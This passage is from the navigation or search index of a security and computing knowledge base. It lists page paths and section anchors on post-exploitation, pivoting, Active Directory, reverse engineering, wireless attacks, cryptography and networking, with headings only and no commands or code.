Exploitation/Enumeration/Linux/System Enumeration.html#enumerating-the-distribution-version","Post Exploitation/Enumeration/Linux/System Enumeration.html#enumerating-linux-kernel-version-information","Post Exploitation/Enumeration/Linux/System Enumeration.html#enumerating-cpu-architecture","Post Exploitation/Enumeration/Linux/System Enumeration.html#enumerating-running-services","Post Exploitation/Enumeration/Linux/System Enumeration.html#file-system-enumeration","Post Exploitation/Enumeration/Linux/User Enumeration.html#enumerate-user-name-and-group","Post Exploitation/Enumeration/Linux/User Enumeration.html#enumerate-commands-runnable-as-root","Post Exploitation/Enumeration/Linux/User Enumeration.html#list-users-on-the-machine","Post Exploitation/Enumeration/Linux/User Enumeration.html#get-history-of-commands-the-user-has-run","Post Exploitation/Enumeration/Linux/Network Enumeration.html#list-network-interfaces-and-network-information","Post Exploitation/Enumeration/Linux/Network Enumeration.html#list-open-ports","Post Exploitation/Enumeration/Windows/index.html#introduction","Post Exploitation/Enumeration/Windows/index.html#windows-enumeration-with-winpeas","Post Exploitation/Enumeration/Windows/System Enumeration.html#enumerate-system-information","Post Exploitation/Enumeration/Windows/System Enumeration.html#enumerate-patches","Post Exploitation/Enumeration/Windows/System Enumeration.html#enumerate-drives","Post Exploitation/Pivoting/index.html#introduction","Post Exploitation/Pivoting/Tunneling with Chisel.html#introduction","Post Exploitation/Pivoting/Tunneling with Chisel.html#creating-a-reverse-tunnel","Post Exploitation/Pivoting/SSH Tunneling.html#introduction","Post Exploitation/Pivoting/SSH Tunneling.html#local-port-forwarding","Post Exploitation/Pivoting/SSH Tunneling.html#remote-port-forwarding","Post Exploitation/Active Directory (AD)/index.html#active-directory-ad","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#overview","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#get-domain-information","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#get-domain-controller-information","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#retrieve-domain-policy-information","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#get-users-information","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#get-user-property-information","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#get-domain-machines","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#get-groups","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#get-group-policy-information","Post Exploitation/Active Directory (AD)/Domain Enumeration with PowerView.html#additional-resources","Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html#overview","Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html#setup","Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html#collecting-data-for-bloodhound","Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html#viewing-the-data","Post Exploitation/Active Directory (AD)/Domain Data Enumeration with Bloodhound.html#finding-relationships-in-the-data","System Internals/index.html","System Internals/Linux/index.html","System Internals/Linux/Processes.html#user-id","System Internals/Linux/File System.html#unified-file-system","System Internals/Linux/File System.html#symbolic-links","System Internals/Linux/File System.html#hard-links","System Internals/Linux/File System.html#permissions","System Internals/Linux/File System.html#set-owner-user-id-suid","System Internals/Linux/File System.html#set-group-id-sgid","System Internals/Linux/File System.html#sticky-bit","System Internals/Linux/Command Line.html#introduction","System Internals/Linux/Command Line.html#input-and-output-redirection","System Internals/Linux/Command Line.html#pipes","System Internals/Windows/index.html","System Internals/Windows/Active Directory (AD)/index.html#introduction","System Internals/Windows/Active Directory (AD)/index.html#objects","System Internals/Windows/Active Directory (AD)/index.html#object-organisation","System Internals/Windows/Active Directory (AD)/index.html#distinguished-name-dn--relative-distinguished-name-rdn","System Internals/Windows/Active Directory (AD)/index.html#trusts","System Internals/Windows/Active Directory (AD)/Contacts.html#introduction","System Internals/Windows/Active Directory (AD)/Terminology.html","System Internals/Windows/Active Directory (AD)/Users.html#introduction","System Internals/Windows/Active Directory (AD)/Users.html#domain-users","System Internals/Windows/Active Directory (AD)/Groups.html#introduction","System Internals/Windows/Active Directory (AD)/Groups.html#group-type","System Internals/Windows/Active Directory (AD)/Groups.html#group-scope","System Internals/Windows/Active Directory (AD)/Groups.html#default-groups","System Internals/Windows/Active Directory (AD)/Domain Controllers.html#introduction","System Internals/Windows/Active Directory (AD)/Computers.html#introduction","System Internals/Windows/File System.html#introduction","System Internals/Windows/File System.html#permissions","System Internals/Windows/File System.html#inspecting-permissions","System Internals/Windows/File System.html#alternate-data-streams-ads","System Internals/Windows/File System.html#working-with-adss","Reverse Engineering/index.html#reverse-engineering","Reverse Engineering/Program Anatomy/index.html#program-anatomy","Reverse Engineering/Program Anatomy/The Stack.html#the-stack","Reverse Engineering/Program Anatomy/The Stack.html#stack-frames","Reverse Engineering/Program Anatomy/Instructions.html#instructions","Reverse Engineering/Program Anatomy/Instructions.html#mov","Reverse Engineering/Program Anatomy/Instructions.html#lea","Reverse Engineering/Program Anatomy/Instructions.html#add","Reverse Engineering/Program Anatomy/Instructions.html#sub","Reverse Engineering/Program Anatomy/Instructions.html#xor","Reverse Engineering/Program Anatomy/Instructions.html#push","Reverse Engineering/Program Anatomy/Instructions.html#pop","Reverse Engineering/Program Anatomy/Instructions.html#jmp","Reverse Engineering/Program Anatomy/Instructions.html#call","Reverse Engineering/Program Anatomy/Instructions.html#cmp","Reverse Engineering/Program Anatomy/Instructions.html#jz--jnz","Reverse Engineering/Program Anatomy/The Heap.html#the-heap","Reverse Engineering/Program Anatomy/The Heap.html#heap-rules","Reverse Engineering/Program Anatomy/The Heap.html#the-glibc-heap","Reverse Engineering/Program Anatomy/The Heap.html#chunks","Reverse Engineering/Program Anatomy/The Heap.html#memory-allocation-on-the-heap","Reverse Engineering/Program Anatomy/The Heap.html#allocating-from-free-chunks","Reverse Engineering/Program Anatomy/The Heap.html#allocating-from-the-top-chunk","Reverse Engineering/Program Anatomy/The Heap.html#requesting-additional-memory-at-the-top-of-the-heap-from-the-kernel","Reverse Engineering/Program Anatomy/The Heap.html#allocating-large-chunks","Reverse Engineering/Program Anatomy/The Heap.html#arenas","Reverse Engineering/Program Anatomy/The Heap.html#bins","Reverse Engineering/Program Anatomy/The Heap.html#small-bins","Reverse Engineering/Program Anatomy/The Heap.html#large-bins","Reverse Engineering/Program Anatomy/The Heap.html#unsorted-bins","Reverse Engineering/Program Anatomy/The Heap.html#fast-bins","Reverse Engineering/Program Anatomy/The Heap.html#tcache-bins","Reverse Engineering/Program Anatomy/The Heap.html#malloc-and-free","Reverse Engineering/Program Anatomy/The Heap.html#allocation","Reverse Engineering/Program Anatomy/The Heap.html#deallocation","Reverse Engineering/Program Anatomy/Registers.html#registers","Reverse Engineering/Program Anatomy/Registers.html#register-use-in-x64-linux","Reverse Engineering/Program Anatomy/Registers.html#register-dereferencing","Reverse Engineering/Reverse Engineering with Ghidra/index.html#introduction","Reverse Engineering/Reverse Engineering with Ghidra/index.html#installation","Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html#creating-a-project","Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html#loading-a-binary","Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html#initial-analysis","Reverse Engineering/Reverse Engineering with radare2/index.html#introduction","Reverse Engineering/Reverse Engineering with radare2/index.html#loading-a-binary","Reverse Engineering/Reverse Engineering with radare2/Analysis.html#analysis","Reverse Engineering/Reverse Engineering with radare2/Strings.html#strings","Reverse Engineering/Reverse Engineering with radare2/Binary Info.html#binary-info","Reverse Engineering/Reverse Engineering with radare2/Flags.html#flags","Reverse Engineering/Reverse Engineering with radare2/Flags.html#local-flags","Reverse Engineering/Reverse Engineering with radare2/Flags.html#flag-spaces","Reverse Engineering/Reverse Engineering with radare2/Seeking.html#seeking","Reverse Engineering/Assembly Programming/index.html#introduction","Reverse Engineering/Assembly Programming/x86-64/index.html#introduction","Reverse Engineering/Assembly Programming/x86-64/Variables.html#introduction","Reverse Engineering/Assembly Programming/x86-64/Variables.html#constants","Reverse Engineering/Assembly Programming/x86-64/Variables.html#static-initialised-data","Reverse Engineering/Assembly Programming/x86-64/Variables.html#static-uninitialised-data","Reverse Engineering/Assembly Programming/x86-64/Data Representation.html#introduction","Reverse Engineering/Assembly Programming/x86-64/Data Representation.html#integer-representation","Reverse Engineering/Assembly Programming/x86-64/Data Representation.html#twos-complement","Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html#introduction","Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html#register-mode-addressing","Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html#immediate-mode-addressing","Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html#memory-mode-addressing","Reverse Engineering/Assembly Programming/x86-64/Memory.html#endianness","Reverse Engineering/Assembly Programming/x86-64/Memory.html#memory-layout","Reverse Engineering/Assembly Programming/x86-64/Registers.html#introduction","Reverse Engineering/Assembly Programming/x86-64/Registers.html#register-specialisation","Reverse Engineering/Assembly Programming/x86-64/Registers.html#the-stack-pointer-rsp","Reverse Engineering/Assembly Programming/x86-64/Registers.html#the-base-pointer-rbp","Reverse Engineering/Assembly Programming/x86-64/Registers.html#the-instruction-pointer-rip","Reverse Engineering/Assembly Programming/x86-64/Registers.html#the-flag-register-rflags","Reverse Engineering/Assembly Programming/x86-64/Registers.html#floating-point-registers-and-sse","Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html#introduction","Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html#operand-notation","Reverse Engineering/Binary Formats/index.html","Reverse Engineering/Binary Formats/PE/index.html#introduction","Reverse Engineering/Binary Formats/PE/index.html#structure","Reverse Engineering/Binary Formats/PE/Relocations.html#introduction","Reverse Engineering/Binary Formats/PE/Relocations.html#the-relocation-table","Reverse Engineering/Binary Formats/PE/NT Headers.html#introduction","Reverse Engineering/Binary Formats/PE/NT Headers.html#coff-file-header","Reverse Engineering/Binary Formats/PE/NT Headers.html#optional-header","Reverse Engineering/Binary Formats/PE/Sections.html#introduction","Reverse Engineering/Binary Formats/PE/Sections.html#section-header-table","Reverse Engineering/Binary Formats/PE/Sections.html#data-directories","Reverse Engineering/Binary Formats/PE/The Rich Header.html#introduction","Reverse Engineering/Binary Formats/PE/The DOS Header.html#introduction","Reverse Engineering/Binary Formats/PE/The DOS Stub.html#introduction","Reverse Engineering/Binary Formats/ELF/index.html#introduction","Reverse Engineering/Binary Formats/ELF/index.html#structure","Reverse Engineering/Binary Formats/ELF/index.html#file-types","Reverse Engineering/Binary Formats/ELF/Symbols.html#introduction","Reverse Engineering/Binary Formats/ELF/Symbols.html#the-symbol-tables","Reverse Engineering/Binary Formats/ELF/Symbols.html#symbol-types--bindings","Reverse Engineering/Binary Formats/ELF/Symbols.html#symbol-visibility","Reverse Engineering/Binary Formats/ELF/Relocations.html#introduction","Reverse Engineering/Binary Formats/ELF/Sections.html#introduction","Reverse Engineering/Binary Formats/ELF/Sections.html#the-section-header-table-sht","Reverse Engineering/Binary Formats/ELF/Sections.html#section-types","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_null","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_progbits","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_symtab-and-sht_dynsym","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_strtab","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_rela-and-sht_rel","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_hash","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_dynamic","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_note","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_nobits","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_preinit_array-sht_init_array-and-sht_fini_array","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_group","Reverse Engineering/Binary Formats/ELF/Sections.html#sht_symtab_shndx","Reverse Engineering/Binary Formats/ELF/Sections.html#other","Reverse Engineering/Binary Formats/ELF/Sections.html#special-sections","Reverse Engineering/Binary Formats/ELF/Sections.html#section-groups","Reverse Engineering/Binary Formats/ELF/Segments.html#introduction","Reverse Engineering/Binary Formats/ELF/Segments.html#the-programme-header-table","Reverse Engineering/Binary Formats/ELF/Segments.html#segment-types","Reverse Engineering/Binary Formats/ELF/Segments.html#pt_load","Reverse Engineering/Binary Formats/ELF/Segments.html#pt_dynamic","Reverse Engineering/Binary Formats/ELF/Segments.html#pt_note","Reverse Engineering/Binary Formats/ELF/Segments.html#pt_interp","Reverse Engineering/Binary Formats/ELF/Segments.html#pt_phdr","Reverse Engineering/Binary Formats/ELF/Segments.html#pt_tls","Reverse Engineering/Binary Formats/ELF/Segments.html#other-segments","Reverse Engineering/Binary Formats/ELF/Segments.html#segment-flags","Reverse Engineering/Binary Formats/ELF/The ELF Header.html#introduction","Reverse Engineering/Binary Formats/ELF/The ELF Header.html#elf-identification","Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html#introduction","Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html#how-it-works","Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html#_dl_runtime_resolve","Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html#introduction","Reverse Engineering/Assembly.html#introduction","Reverse Engineering/Assembly.html#intel-vs-att-syntax","Reverse Engineering/Assembly.html#intel","Reverse Engineering/Assembly.html#att","Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html#reverse-engineering-with-objdump","Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html#tracing-syscalls-with-strace","Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html#tracing-library-calls-with-ltrace","Hardware Hacking/index.html","Hardware Hacking/Wireless Attacks/index.html#introduction","Hardware Hacking/Wireless Attacks/index.html#monitor-mode","Hardware Hacking/Wireless Attacks/index.html#capturing-wifi-traffic","Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html#introduction","Hardware Hacking/Wireless Attacks/Hacking WPA Networks.html#capturing-the-handshake","Hardware Hacking/Wireless Attacks/Deauth Attack.html#introduction","Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html#introduction","Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html#capturing-the-traffic","Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html#fake-authentication-attack","Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html#arp-replay-attack","Hardware Hacking/Wireless Attacks/Hacking WEP Networks.html#cracking-the-key","Cryptography/index.html#introduction","Cryptography/index.html#historical-background","Cryptography/index.html#caesars-cipher","Cryptography/index.html#substitution-ciphers","Cryptography/index.html#the-enigma","Cryptography/Hash Functions/index.html#introduction","Cryptography/Hash Functions/Birthday Attacks.html#introduction","Cryptography/Hash Functions/Birthday Attacks.html#the-birthday-paradox","Cryptography/Hash Functions/Birthday Attacks.html#naive-birthday-attack","Cryptography/Hash Functions/Birthday Attacks.html#small-space-birthday-attack","Cryptography/Hash Functions/Merkle-Damgård Transform.html#introduction","Cryptography/Hash Functions/Merkle-Damgård Transform.html#the-merkle-damgård-construction","Cryptography/Hash Functions/Merkle-Damgård Transform.html#security-of-merkle-damgård-constructions","Cryptography/Hash Functions/Davies-Meyer Transform.html#the-davies-meyer-transform","Cryptography/Hash Functions/Davies-Meyer Transform.html#security","Cryptography/Hash Functions/Security Definitions.html#collisions","Cryptography/Hash Functions/Security Definitions.html#first--preimage-resistance","Cryptography/Hash Functions/Security Definitions.html#second-preimage-resistance","Cryptography/Hash Functions/Security Definitions.html#collision-resistance","Cryptography/Public-Key Cryptography/index.html#introduction","Cryptography/Public-Key Cryptography/index.html#public-key-encryption","Cryptography/Public-Key Cryptography/Security Definitions/index.html","Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html#introduction","Cryptography/Public-Key Cryptography/Security Definitions/Chosen-Plaintext Attack (CPA).html#introduction","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#modular-arithmetic","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#modulo-reduction","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#modulo-congruence","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#modulo-inversion","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#groups","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#additive-vs-multiplicative-notation","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#some-facts-about-groups","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#the-groups-mathbbz_nandmathbbz_n-theabeliangroupmathbbz_ndenotesthesetofintegers01--n---1equippedwithadditionmodulonasitsgroupoperationtheclosurepropertyistriviallysatisfiedbecausemoduloreductionproducesanumberintherange0n_1similarlyassociativityandcommutativityfollowfromthefactthatintegershavethesepropertiestheidentityelementis0sincea--n---a--0-mod-nitfollowsthattheinverseofanyelementisn---awewouldliketohaveasimilargroupbutwithmultiplicationmodulonasthegroupoperationhoweverthisisnottrivialtodobecauseevennonzeroelementsin01-n--1mightlackaninverseitturnsoutthattheelementsin01-n--1whichareinvertiblemodulonarepreciselythoseintegerswhicharerelativelyprimewithnthereforewecandefinethesetformathbbz_n-asfollowsznb12n1gcdbn1weequipthissetwiththeoperationmultiplicationmodulontoyieldtheabeliangroupmathbbz_n","Cryptography/Public-Key Cryptography/Mathematical Prerequisites.html#cyclic-groups","Cryptography/Primitives/index.html#introduction","Cryptography/Primitives/Pseudorandom Permutations (PRPs).html#pseudorandom-permutations","Cryptography/Primitives/Pseudorandom Permutations (PRPs).html#theoretical-implementation---prps-from-prfs","Cryptography/Primitives/Pseudorandom Permutations (PRPs).html#pseudorandom-permutation-generator-prpg","Cryptography/Primitives/Pseudorandom Generators (PRGs).html#introduction","Cryptography/Primitives/Pseudorandom Generators (PRGs).html#determining-the-security-of-a-prg","Cryptography/Primitives/Pseudorandom Generators (PRGs).html#leap-of-faith","Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html#pseudorandom-functions","Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html#pseudorandom-function-generators-prfgs","Cryptography/Primitives/Pseudorandom Function Generators (PRFGs).html#prfgs-from-prgs","Cryptography/Private-Key Cryptography/index.html#introduction","Cryptography/Private-Key Cryptography/Stream Ciphers/index.html#introduction","Cryptography/Private-Key Cryptography/Stream Ciphers/index.html#seed-derivation","Cryptography/Private-Key Cryptography/Stream Ciphers/index.html#security","Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html#introduction","Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html#feedback-shift-registers","Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html#linear-feedback-shift-registers-lfsr","Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html#introducing-nonlinearity","Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/index.html#filtered-fsrs","Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html","Cryptography/Private-Key Cryptography/Security Definitions/index.html#introduction","Cryptography/Private-Key Cryptography/Security Definitions/index.html#threat-models","Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/index.html#introduction","Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html#introduction","Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Perfect Secrecy.html#long-keys-requirement","Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html#introduction","Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html#semantic-security","Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext-Only Attack (COA)/Semantic Security.html#leap-of-faith","Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html#chosen-plaintext-attack-cpa","Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html#cpa-security","Cryptography/Private-Key Cryptography/Security Definitions/Chosen Plaintext Attack (CPA).html#theoretical-implementation","Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html#introduction","Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html#statistical-tests","Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html#obtaining-randomness","Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html#pseudorandomness","Cryptography/Private-Key Cryptography/Security Definitions/Randomness.html#comparing-distributions","Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html#introduction","Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html#chosen-ciphertext-attack-cca","Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html#cca-security","Cryptography/Private-Key Cryptography/Security Definitions/Chosen Ciphertext Attack (CCA).html#theoretical-implementation","Cryptography/Private-Key Cryptography/Security Definitions/P vs NP.html#introduction","Cryptography/Private-Key Cryptography/Security Definitions/Ciphertext Integrity (CI).html#ciphertext-integrity-ci","Cryptography/Private-Key Cryptography/Block Ciphers/index.html#introduction","Cryptography/Private-Key Cryptography/Block Ciphers/index.html#implementation","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html#introduction","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html#the-counter-ctr-mode","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html#security-of-ctr-mode","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Counter (CTR) Mode.html#iv-reuse-attack","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html#the-cipher-block-chaining-cbc-mode","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html#security-of-cbc-mode","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Cipher Block Chaining (CBC) Mode.html#iv-reuse-attack","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html#introduction","Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html#security-of-ecb-mode","Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html#introduction","Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html#aes-operations","Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html#subbytes","Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html#shiftrows--mixcolumns","Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html#addroundkey","Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html#encryption","Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html#decryption","Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html#introduction","Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html#how-it-works","Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html#reverse-padding-oracle-attack","Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html#padding-oracle-attacks-with-padbuster","Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html#introduction","Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html#message-padding","Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html#ciphertext-stealing","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html#introduction","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html#message-authentication-codes","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html#security","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html#replay-attacks","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html#implementing-macs","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html#hash-based-macs-hmac","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html#security-of-hmac","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html#fixed-length-macs","Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html#theoretical-abritrary-length-macs","Cryptography/Private-Key Cryptography/One-Time Passwords/index.html#introduction","Cryptography/Private-Key Cryptography/One-Time Passwords/index.html#one-time-passwords","Cryptography/Private-Key Cryptography/One-Time Passwords/index.html#security-of-one-time-passwords","Cryptography/Private-Key Cryptography/One-Time Passwords/index.html#replay-attacks","Cryptography/Private-Key Cryptography/One-Time Passwords/HMAC-Based One-Time Passwords (HOTP).html#introduction","Cryptography/Private-Key Cryptography/One-Time Passwords/Time-Based One-Time Passwords (TOTP).html#introduction","Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html#introduction","Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html#implementation","Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html#construction-from-a-cipher-and-a-mac","Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html#encrypt-and-sign","Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html#sign-then-encrypt","Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html#encrypt-then-sign","Cryptography/Private-Key Cryptography/One-Time Pad.html#introduction","Cryptography/Private-Key Cryptography/One-Time Pad.html#attacks-on-the-one-time-pad","Cryptography/Integrity Verification/index.html","Cryptography/Integrity Verification/Merkle Trees.html#introduction","Cryptography/Integrity Verification/Merkle Trees.html#merkle-trees","Cryptography/Key Management/index.html","Cryptography/Key Management/Key Exchange/index.html","Cryptography/Key Management/Key Exchange/Security Definitions.html#introduction","Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html#introduction","Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html#diffie-hellman-key-exchange","Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html#the-diffie-hellman-problems","Cryptography/Breaking Classical Cryptrography.html#the-shift-cipher","Cryptography/Breaking Classical Cryptrography.html#the-vigenère-cipher","Cryptography/Mathematical Prerequisites.html#sets","Cryptography/Mathematical Prerequisites.html#set-size","Cryptography/Mathematical Prerequisites.html#set-operations","Cryptography/Mathematical Prerequisites.html#strings","Cryptography/Mathematical Prerequisites.html#functions","Cryptography/Mathematical Prerequisites.html#function-definition","Cryptography/Mathematical Prerequisites.html#logical-operations","Cryptography/Mathematical Prerequisites.html#logical-not","Cryptography/Mathematical Prerequisites.html#logical-and","Cryptography/Mathematical Prerequisites.html#logical-or","Cryptography/Mathematical Prerequisites.html#exclusive-or","Cryptography/Mathematical Prerequisites.html#negligible-functions","Cryptography/Mathematical Prerequisites.html#probability","Cryptography/Mathematical Prerequisites.html#events","Cryptography/Mathematical Prerequisites.html#logic-with-events","Cryptography/Mathematical Prerequisites.html#random-variables","Cryptography/Mathematical Prerequisites.html#expectation-value","Cryptography/Mathematical Prerequisites.html#distributions","Cryptography/Computer Science Prerequisites.html#algorithms","Cryptography/Computer Science Prerequisites.html#running-time","Cryptography/Computer Science Prerequisites.html#analysing-time-complexity","Cryptography/Computer Science Prerequisites.html#efficient-and-inefficient-algorithms","Cryptography/Computer Science Prerequisites.html#problem-classes","Networking/index.html#networking","Networking/Protocols/index.html#introduction","Networking/Protocols/Internet Protocol (IP)/index.html","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html#introduction","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html#ip-addressing","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html#public-vs-private-addresses","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/index.html#ip-address-format","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html#introduction","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html#subnet-addressing","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html#subnet-mask","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html#default-subnet-mask","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html#custom-subnet-mask","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Subnetting.html#number-of-subnets--hosts","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html#introduction","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html#classes","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html#loopback-addressing","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classful Addressing.html#problems","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html#introduction","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html#cidr-slash-notation","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html#introduction","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html#ip-header","Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 